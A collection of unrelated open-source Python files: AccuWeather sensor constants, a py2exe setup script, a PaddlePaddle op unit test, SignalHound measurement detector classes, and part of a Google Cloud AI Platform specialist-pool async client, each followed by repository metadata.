ATTR_ICON: "mdi:weather-sunny",
ATTR_LABEL: "UV Index",
ATTR_UNIT_METRIC: UV_INDEX,
ATTR_UNIT_IMPERIAL: UV_INDEX,
ATTR_ENABLED: True,
},
"WindGustDay": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-windy",
ATTR_LABEL: "Wind Gust Day",
ATTR_UNIT_METRIC: SPEED_KILOMETERS_PER_HOUR,
ATTR_UNIT_IMPERIAL: SPEED_MILES_PER_HOUR,
ATTR_ENABLED: False,
},
"WindGustNight": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-windy",
ATTR_LABEL: "Wind Gust Night",
ATTR_UNIT_METRIC: SPEED_KILOMETERS_PER_HOUR,
ATTR_UNIT_IMPERIAL: SPEED_MILES_PER_HOUR,
ATTR_ENABLED: False,
},
"WindDay": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-windy",
ATTR_LABEL: "Wind Day",
ATTR_UNIT_METRIC: SPEED_KILOMETERS_PER_HOUR,
ATTR_UNIT_IMPERIAL: SPEED_MILES_PER_HOUR,
ATTR_ENABLED: True,
},
"WindNight": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-windy",
ATTR_LABEL: "Wind Night",
ATTR_UNIT_METRIC: SPEED_KILOMETERS_PER_HOUR,
ATTR_UNIT_IMPERIAL: SPEED_MILES_PER_HOUR,
ATTR_ENABLED: True,
},
}
SENSOR_TYPES: Final[dict[str, SensorDescription]] = {
"ApparentTemperature": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "Apparent Temperature",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: False,
},
"Ceiling": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-fog",
ATTR_LABEL: "Cloud Ceiling",
ATTR_UNIT_METRIC: LENGTH_METERS,
ATTR_UNIT_IMPERIAL: LENGTH_FEET,
ATTR_ENABLED: True,
},
"CloudCover": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-cloudy",
ATTR_LABEL: "Cloud Cover",
ATTR_UNIT_METRIC: PERCENTAGE,
ATTR_UNIT_IMPERIAL: PERCENTAGE,
ATTR_ENABLED: False,
},
"DewPoint": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "Dew Point",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: False,
},
"RealFeelTemperature": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "RealFeel Temperature",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: True,
},
"RealFeelTemperatureShade": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "RealFeel Temperature Shade",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: False,
},
"Precipitation": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-rainy",
ATTR_LABEL: "Precipitation",
ATTR_UNIT_METRIC: LENGTH_MILLIMETERS,
ATTR_UNIT_IMPERIAL: LENGTH_INCHES,
ATTR_ENABLED: True,
},
"PressureTendency": {
ATTR_DEVICE_CLASS: "accuweather__pressure_tendency",
ATTR_ICON: "mdi:gauge",
ATTR_LABEL: "Pressure Tendency",
ATTR_UNIT_METRIC: None,
ATTR_UNIT_IMPERIAL: None,
ATTR_ENABLED: True,
},
"UVIndex": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-sunny",
ATTR_LABEL: "UV Index",
ATTR_UNIT_METRIC: UV_INDEX,
ATTR_UNIT_IMPERIAL: UV_INDEX,
ATTR_ENABLED: True,
},
"WetBulbTemperature": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "Wet Bulb Temperature",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: False,
},
"WindChillTemperature": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "Wind Chill Temperature",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: False,
},
"Wind": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-windy",
ATTR_LABEL: "Wind",
ATTR_UNIT_METRIC: SPEED_KILOMETERS_PER_HOUR,
ATTR_UNIT_IMPERIAL: SPEED_MILES_PER_HOUR,
ATTR_ENABLED: True,
},
"WindGust": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-windy",
ATTR_LABEL: "Wind Gust",
ATTR_UNIT_METRIC: SPEED_KILOMETERS_PER_HOUR,
ATTR_UNIT_IMPERIAL: SPEED_MILES_PER_HOUR,
ATTR_ENABLED: False,
},
}
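# Illustrative note (added, not part of the original module): each entry above is a
# plain dict keyed by the AccuWeather API field name, e.g.:
#     SENSOR_TYPES["Wind"][ATTR_LABEL]        # "Wind"
#     SENSOR_TYPES["Wind"][ATTR_UNIT_METRIC]  # SPEED_KILOMETERS_PER_HOUR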
| kennedyshead/home-assistant | homeassistant/components/accuweather/const.py | Python | apache-2.0 | 10,736 | 0 |
from setuptools import setup
import py2exe
import os
import glob
__import__('gtk')
__import__('jinja2')
__import__('docutils')
setup_dict = dict(
name='regenerate',
version='1.0.0',
license='License.txt',
author='Donald N. Allingham',
author_email='dallingham@gmail.com',
description='Register editor for ASIC/FPGA designs',
    long_description='Allows users to manage registers for '
'ASIC and FPGA designs. Capable of generating Verilog '
'RTL, test code, C and assembler header files, and documentation.',
packages=[
"regenerate",
"regenerate.db",
"regenerate.importers",
"regenerate.extras",
"regenerate.settings",
"regenerate.ui",
"regenerate.writers"
],
package_dir={
"regenerate" : "regenerate",
},
package_data={
'regenerate' : [
"data/ui/*.ui",
"data/media/*",
"data/help/*.rst",
"data/extra/*",
"data/*.*",
"writers/templates/*"
]
},
include_package_data=True,
url="https://github.com/dallingham/regenerate",
scripts=[
"bin/regenerate",
"bin/regbuild",
"bin/regupdate",
"bin/regxref",
"bin/regdiff"
],
classifiers=[
'Operating System :: POSIX', 'Programming Language :: Python :: 2.7',
'License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)',
'Topic :: Scientific/Engineering :: Electronic Design Automation (EDA)'
],
windows=[
{
"script" : "bin/regenerate",
"icon_resources" : [(1, "regenerate/data/media/flop.ico")]
}
],
options={
'py2exe': {
'includes' : 'cairo, pango, pangocairo, atk, gobject, gio, gtk.keysyms, jinja2',
'skip_archive' : True,
'dll_excludes': [
'MSVCP90.dll',
'api-ms-win-core-string-l1-1-0.dll',
'api-ms-win-core-registry-l1-1-0.dll',
'api-ms-win-core-errorhandling-l1-1-1.dll',
'api-ms-win-core-string-l2-1-0.dll',
'api-ms-win-core-profile-l1-1-0.dll',
'api-ms-win-core-processthreads-l1-1-2.dll',
'api-ms-win-core-libraryloader-l1-2-1.dll',
'api-ms-win-core-file-l1-2-1.dll',
'api-ms-win-security-base-l1-2-0.dll',
'api-ms-win-eventing-provider-l1-1-0.dll',
'api-ms-win-core-heap-l2-1-0.dll',
'api-ms-win-core-libraryloader-l1-2-0.dll',
'api-ms-win-core-localization-l1-2-1.dll',
'api-ms-win-core-sysinfo-l1-2-1.dll',
'api-ms-win-core-synch-l1-2-0.dll',
'api-ms-win-core-heap-l1-2-0.dll']
}
},
)
setup(**setup_dict)
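# Illustrative note (added, not part of the original file): with py2exe installed,
# a Windows build would typically be produced with something like:
#     python setup-win.py py2exe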
| dallingham/regenerate | setup-win.py | Python | gpl-2.0 | 3,108 | 0.003861 |
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from op_test import OpTest
from test_reorder_lod_tensor import convert_to_offset
from sequence.test_sequence_pool import compute_seqpool_sum, compute_seqpool_avg, compute_seqpool_sqrt
from test_cvm_op import cvm_compute
class TestFusionSeqPoolCVMConcatOp(OpTest):
def setUp(self):
self.w = 11
self.use_cvm = True
self.lods = [[[2, 3, 5]], [[1, 5, 2]]]
self.set_conf()
self.set_pooltype()
self.op_type = 'fusion_seqpool_cvm_concat'
self.axis = 1
bs = len(self.lods[0][0])
inputs = []
outs = []
# The cvm variable is not actually used.
cvm = np.array([[0.6, 0.4]]).astype("float32")
i = 0
for lod in self.lods:
assert bs == len(lod[0]), 'All lod size should be equal'
x = np.random.uniform(0.1, 1,
[sum(lod[0]), self.w]).astype('float32')
offset = convert_to_offset(lod)
out = np.zeros((bs, self.w)).astype('float32')
if self.pooltype == "SUM":
compute_seqpool_sum(x, offset, out)
out = cvm_compute(out, self.w, self.use_cvm)
elif self.pooltype == "AVERAGE":
compute_seqpool_avg(x, offset, out)
out = cvm_compute(out, self.w, self.use_cvm)
elif self.pooltype == "SQRT":
compute_seqpool_sqrt(x, offset, out)
out = cvm_compute(out, self.w, self.use_cvm)
else:
raise Exception("Unsupported pool type!")
inputs.append(('x_{0}'.format(i), (x, lod)))
outs.append(out)
i = i + 1
self.inputs = {'X': inputs, "CVM": cvm}
self.outputs = {'Out': np.concatenate(outs, axis=self.axis)}
self.attrs = {
'pooltype': self.pooltype,
'axis': self.axis,
}
def set_pooltype(self):
self.pooltype = "SUM"
def set_conf(self):
pass
def test_check_output(self):
self.check_output()
class TestFusionSeqPoolCVMConcatOpCase1(TestFusionSeqPoolCVMConcatOp):
def set_conf(self):
self.lods = [[[1]]]
class TestFusionSeqPoolCVMConcatOpCase2(TestFusionSeqPoolCVMConcatOp):
def set_conf(self):
self.lods = [[[1]], [[1]], [[1]]]
class TestFusionSeqPoolCVMConcatOpCase3(TestFusionSeqPoolCVMConcatOp):
def set_conf(self):
self.lods = [[[1, 3, 4, 6]]]
self.w = 10
class TestFusionSeqPoolCVMConcatOpCase4(TestFusionSeqPoolCVMConcatOp):
def set_conf(self):
self.lods = [[[2, 13, 4]], [[1, 1, 1]], [[5, 3, 1]], [[9, 10, 3]]]
self.w = 3
## test avg pool and sqrt
def create_test_avg_sqrt_class(parent):
class TestSeqPoolAvgCase(parent):
def set_pooltype(self):
self.pooltype = "AVERAGE"
class TestSeqPoolSqrtCase(parent):
def set_pooltype(self):
self.pooltype = "SQRT"
cls_name_avg = "{0}_{1}".format(parent.__name__, "avg")
cls_name_sqrt = "{0}_{1}".format(parent.__name__, "sqrt")
TestSeqPoolAvgCase.__name__ = cls_name_avg
TestSeqPoolSqrtCase.__name__ = cls_name_sqrt
globals()[cls_name_avg] = TestSeqPoolAvgCase
globals()[cls_name_sqrt] = TestSeqPoolSqrtCase
create_test_avg_sqrt_class(TestFusionSeqPoolCVMConcatOp)
create_test_avg_sqrt_class(TestFusionSeqPoolCVMConcatOpCase1)
create_test_avg_sqrt_class(TestFusionSeqPoolCVMConcatOpCase2)
create_test_avg_sqrt_class(TestFusionSeqPoolCVMConcatOpCase3)
create_test_avg_sqrt_class(TestFusionSeqPoolCVMConcatOpCase4)
if __name__ == '__main__':
unittest.main()
| luotao1/Paddle | python/paddle/fluid/tests/unittests/test_fusion_seqpool_cvm_concat_op.py | Python | apache-2.0 | 4,299 | 0.000465 |
"""
SignalHound related detector functions
extracted from pycqed/measurement/detector_functions.py commit 0da380ad2adf2dc998f5effef362cdf264b87948
"""
import logging
import time
from packaging import version
import qcodes as qc
from pycqed.measurement.det_fncs.Base import Soft_Detector, Hard_Detector
from pycqed.measurement.waveform_control import pulse
from pycqed.measurement.waveform_control import element
from pycqed.measurement.waveform_control import sequence
# import instruments for type annotations
from pycqed.instrument_drivers.physical_instruments.USB_SA124B import SignalHound_USB_SA124B
log = logging.getLogger(__name__)
class Signal_Hound_fixed_frequency(Soft_Detector):
def __init__(
self,
signal_hound: SignalHound_USB_SA124B,
frequency=None,
Navg=1,
delay=0.1,
prepare_for_each_point=False,
prepare_function=None,
prepare_function_kwargs: dict = {}
):
super().__init__()
self.frequency = frequency
self.name = 'SignalHound_fixed_frequency'
self.value_names = ['Power']
self.value_units = ['dBm']
self.delay = delay
self.SH = signal_hound
if frequency is not None:
self.SH.frequency(frequency)
self.Navg = Navg
self.prepare_for_each_point = prepare_for_each_point
self.prepare_function = prepare_function
self.prepare_function_kwargs = prepare_function_kwargs
def acquire_data_point(self, **kw):
if self.prepare_for_each_point:
self.prepare()
time.sleep(self.delay)
if version.parse(qc.__version__) < version.parse('0.1.11'):
return self.SH.get_power_at_freq(Navg=self.Navg)
else:
self.SH.avg(self.Navg)
return self.SH.power()
def prepare(self, **kw):
if qc.__version__ < '0.1.11':
self.SH.prepare_for_measurement()
if self.prepare_function is not None:
self.prepare_function(**self.prepare_function_kwargs)
def finish(self, **kw):
self.SH.abort()
class Signal_Hound_sweeped_frequency(Hard_Detector):
def __init__(
self,
signal_hound: SignalHound_USB_SA124B,
Navg=1,
delay=0.1,
**kw
):
super().__init__()
self.name = 'SignalHound_fixed_frequency'
self.value_names = ['Power']
self.value_units = ['dBm']
self.delay = delay
self.SH = signal_hound
self.Navg = Navg
def acquire_data_point(self, **kw):
frequency = self.swp.pop()
self.SH.set('frequency', frequency)
self.SH.prepare_for_measurement()
time.sleep(self.delay)
return self.SH.get_power_at_freq(Navg=self.Navg)
def get_values(self):
return ([self.acquire_data_point()])
def prepare(self, sweep_points):
self.swp = list(sweep_points)
# self.SH.prepare_for_measurement()
def finish(self, **kw):
self.SH.abort()
class SH_mixer_skewness_det(Soft_Detector):
'''
Based on the "Signal_Hound_fixed_frequency" detector.
generates an AWG seq to measure sideband transmission
Inputs:
frequency (Hz)
QI_amp_ratio (parameter)
IQ_phase (parameter)
SH (instrument)
f_mod (Hz)
'''
def __init__(
self,
frequency,
QI_amp_ratio,
IQ_phase,
SH: SignalHound_USB_SA124B,
I_ch, Q_ch,
station,
Navg=1,
delay=0.1,
f_mod=10e6,
verbose=False,
**kw):
super(SH_mixer_skewness_det, self).__init__()
self.SH = SH
self.frequency = frequency
self.name = 'SignalHound_mixer_skewness_det'
self.value_names = ['Power']
self.value_units = ['dBm']
self.delay = delay
self.SH.frequency.set(frequency) # Accepts input in Hz
self.Navg = Navg
self.QI_amp_ratio = QI_amp_ratio
self.IQ_phase = IQ_phase
self.pulsar = station.pulsar
self.f_mod = f_mod
self.I_ch = I_ch
self.Q_ch = Q_ch
self.verbose = verbose
def acquire_data_point(self, **kw):
QI_ratio = self.QI_amp_ratio.get()
skewness = self.IQ_phase.get()
if self.verbose:
print('QI ratio: %.3f' % QI_ratio)
print('skewness: %.3f' % skewness)
self.generate_awg_seq(QI_ratio, skewness, self.f_mod)
self.pulsar.AWG.start()
time.sleep(self.delay)
return self.SH.get_power_at_freq(Navg=self.Navg)
def generate_awg_seq(self, QI_ratio, skewness, f_mod):
SSB_modulation_el = element.Element('SSB_modulation_el',
pulsar=self.pulsar)
cos_pulse = pulse.CosPulse(channel=self.I_ch, name='cos_pulse')
sin_pulse = pulse.CosPulse(channel=self.Q_ch, name='sin_pulse')
SSB_modulation_el.add(pulse.cp(cos_pulse, name='cos_pulse',
frequency=f_mod, amplitude=0.15,
length=1e-6, phase=0))
SSB_modulation_el.add(pulse.cp(sin_pulse, name='sin_pulse',
frequency=f_mod, amplitude=0.15 *
QI_ratio,
length=1e-6, phase=90 + skewness))
seq = sequence.Sequence('Sideband_modulation_seq')
seq.append(name='SSB_modulation_el', wfname='SSB_modulation_el',
trigger_wait=False)
self.pulsar.program_awgs(seq, SSB_modulation_el)
def prepare(self, **kw):
self.SH.prepare_for_measurement()
def finish(self, **kw):
self.SH.abort()
| DiCarloLab-Delft/PycQED_py3 | pycqed/measurement/det_fncs/hard/SignalHound.py | Python | mit | 5,908 | 0.000508 |
import logging
class Error(Exception):
def __init__(self, message, data = {}):
self.message = message
self.data = data
def __str__(self):
return self.message + ": " + repr(self.data)
@staticmethod
def die(code, error, message = None):
if isinstance(error, Exception):
e = error
error = '{0}.{1}'.format(type(e).__module__, type(e).__name__)
message = str(e)
print 'Error: ' + error
if message:
print message
#logging.exception(message)
exit(code)
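# Illustrative sketch (added, not part of the original module): die() accepts either
# an error name string or an exception instance, e.g.:
#     Error.die(2, 'object_not_found', 'domain does not exist')
#     Error.die(1, ValueError('bad input'))  # error name derived from the exception type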
| hiqdev/reppy | heppy/Error.py | Python | bsd-3-clause | 580 | 0.010345 |
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import functools
import re
from typing import Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core.client_options import ClientOptions
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.api_core import operation as gac_operation # type: ignore
from google.api_core import operation_async # type: ignore
from google.cloud.aiplatform_v1.services.specialist_pool_service import pagers
from google.cloud.aiplatform_v1.types import operation as gca_operation
from google.cloud.aiplatform_v1.types import specialist_pool
from google.cloud.aiplatform_v1.types import specialist_pool as gca_specialist_pool
from google.cloud.aiplatform_v1.types import specialist_pool_service
from google.protobuf import empty_pb2 # type: ignore
from google.protobuf import field_mask_pb2 # type: ignore
from .transports.base import SpecialistPoolServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc_asyncio import SpecialistPoolServiceGrpcAsyncIOTransport
from .client import SpecialistPoolServiceClient
class SpecialistPoolServiceAsyncClient:
"""A service for creating and managing Customer SpecialistPools.
When customers start Data Labeling jobs, they can reuse/create
Specialist Pools to bring their own Specialists to label the
data. Customers can add/remove Managers for the Specialist Pool
on Cloud console, then Managers will get email notifications to
manage Specialists and tasks on CrowdCompute console.
"""
_client: SpecialistPoolServiceClient
DEFAULT_ENDPOINT = SpecialistPoolServiceClient.DEFAULT_ENDPOINT
DEFAULT_MTLS_ENDPOINT = SpecialistPoolServiceClient.DEFAULT_MTLS_ENDPOINT
specialist_pool_path = staticmethod(
SpecialistPoolServiceClient.specialist_pool_path
)
parse_specialist_pool_path = staticmethod(
SpecialistPoolServiceClient.parse_specialist_pool_path
)
common_billing_account_path = staticmethod(
SpecialistPoolServiceClient.common_billing_account_path
)
parse_common_billing_account_path = staticmethod(
SpecialistPoolServiceClient.parse_common_billing_account_path
)
common_folder_path = staticmethod(SpecialistPoolServiceClient.common_folder_path)
parse_common_folder_path = staticmethod(
SpecialistPoolServiceClient.parse_common_folder_path
)
common_organization_path = staticmethod(
SpecialistPoolServiceClient.common_organization_path
)
parse_common_organization_path = staticmethod(
SpecialistPoolServiceClient.parse_common_organization_path
)
common_project_path = staticmethod(SpecialistPoolServiceClient.common_project_path)
parse_common_project_path = staticmethod(
SpecialistPoolServiceClient.parse_common_project_path
)
common_location_path = staticmethod(
SpecialistPoolServiceClient.common_location_path
)
parse_common_location_path = staticmethod(
SpecialistPoolServiceClient.parse_common_location_path
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
SpecialistPoolServiceAsyncClient: The constructed client.
"""
return SpecialistPoolServiceClient.from_service_account_info.__func__(SpecialistPoolServiceAsyncClient, info, *args, **kwargs) # type: ignore
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
SpecialistPoolServiceAsyncClient: The constructed client.
"""
return SpecialistPoolServiceClient.from_service_account_file.__func__(SpecialistPoolServiceAsyncClient, filename, *args, **kwargs) # type: ignore
from_service_account_json = from_service_account_file
@classmethod
def get_mtls_endpoint_and_cert_source(
cls, client_options: Optional[ClientOptions] = None
):
"""Return the API endpoint and client cert source for mutual TLS.
The client cert source is determined in the following order:
(1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not "true", the
client cert source is None.
(2) if `client_options.client_cert_source` is provided, use the provided one; if the
default client cert source exists, use the default one; otherwise the client cert
source is None.
The API endpoint is determined in the following order:
        (1) if `client_options.api_endpoint` is provided, use the provided one.
        (2) if the `GOOGLE_API_USE_MTLS_ENDPOINT` environment variable is "always", use the
        default mTLS endpoint; if the environment variable is "never", use the default API
endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise
use the default API endpoint.
More details can be found at https://google.aip.dev/auth/4114.
Args:
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. Only the `api_endpoint` and `client_cert_source` properties may be used
in this method.
Returns:
Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the
client cert source to use.
Raises:
google.auth.exceptions.MutualTLSChannelError: If any errors happen.
"""
return SpecialistPoolServiceClient.get_mtls_endpoint_and_cert_source(client_options) # type: ignore
@property
def transport(self) -> SpecialistPoolServiceTransport:
"""Returns the transport used by the client instance.
Returns:
SpecialistPoolServiceTransport: The transport used by the client instance.
"""
return self._client.transport
get_transport_class = functools.partial(
type(SpecialistPoolServiceClient).get_transport_class,
type(SpecialistPoolServiceClient),
)
def __init__(
self,
*,
credentials: ga_credentials.Credentials = None,
transport: Union[str, SpecialistPoolServiceTransport] = "grpc_asyncio",
client_options: ClientOptions = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the specialist pool service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.SpecialistPoolServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (ClientOptions): Custom options for the client. It
won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._client = SpecialistPoolServiceClient(
credentials=credentials,
transport=transport,
client_options=client_options,
client_info=client_info,
)
async def create_specialist_pool(
self,
request: Union[
specialist_pool_service.CreateSpecialistPoolRequest, dict
] = None,
*,
parent: str = None,
specialist_pool: gca_specialist_pool.SpecialistPool = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Creates a SpecialistPool.
.. code-block:: python
from google.cloud import aiplatform_v1
def sample_create_specialist_pool():
# Create a client
client = aiplatform_v1.SpecialistPoolServiceClient()
# Initialize request argument(s)
specialist_pool = aiplatform_v1.SpecialistPool()
specialist_pool.name = "name_value"
specialist_pool.display_name = "display_name_value"
request = aiplatform_v1.CreateSpecialistPoolRequest(
parent="parent_value",
specialist_pool=specialist_pool,
)
# Make the request
operation = client.create_specialist_pool(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.CreateSpecialistPoolRequest, dict]):
The request object. Request message for
[SpecialistPoolService.CreateSpecialistPool][google.cloud.aiplatform.v1.SpecialistPoolService.CreateSpecialistPool].
parent (:class:`str`):
Required. The parent Project name for the new
SpecialistPool. The form is
``projects/{project}/locations/{location}``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
specialist_pool (:class:`google.cloud.aiplatform_v1.types.SpecialistPool`):
Required. The SpecialistPool to
create.
This corresponds to the ``specialist_pool`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1.types.SpecialistPool` SpecialistPool represents customers' own workforce to work on their data
labeling jobs. It includes a group of specialist
managers and workers. Managers are responsible for
managing the workers in this pool as well as
customers' data labeling jobs associated with this
pool. Customers create specialist pool as well as
start data labeling jobs on Cloud, managers and
workers handle the jobs using CrowdCompute console.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, specialist_pool])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = specialist_pool_service.CreateSpecialistPoolRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if specialist_pool is not None:
request.specialist_pool = specialist_pool
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.create_specialist_pool,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
gca_specialist_pool.SpecialistPool,
metadata_type=specialist_pool_service.CreateSpecialistPoolOperationMetadata,
)
# Done; return the response.
return response
async def get_specialist_pool(
self,
request: Union[specialist_pool_service.GetSpecialistPoolRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> specialist_pool.SpecialistPool:
r"""Gets a SpecialistPool.
.. code-block:: python
from google.cloud import aiplatform_v1
def sample_get_specialist_pool():
# Create a client
client = aiplatform_v1.SpecialistPoolServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.GetSpecialistPoolRequest(
name="name_value",
)
# Make the request
response = client.get_specialist_pool(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.GetSpecialistPoolRequest, dict]):
The request object. Request message for
[SpecialistPoolService.GetSpecialistPool][google.cloud.aiplatform.v1.SpecialistPoolService.GetSpecialistPool].
name (:class:`str`):
Required. The name of the SpecialistPool resource. The
form is
``projects/{project}/locations/{location}/specialistPools/{specialist_pool}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.SpecialistPool:
SpecialistPool represents customers'
own workforce to work on their data
labeling jobs. It includes a group of
specialist managers and workers.
Managers are responsible for managing
the workers in this pool as well as
customers' data labeling jobs associated
with this pool. Customers create
specialist pool as well as start data
labeling jobs on Cloud, managers and
workers handle the jobs using
CrowdCompute console.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = specialist_pool_service.GetSpecialistPoolRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.get_specialist_pool,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
async def list_specialist_pools(
self,
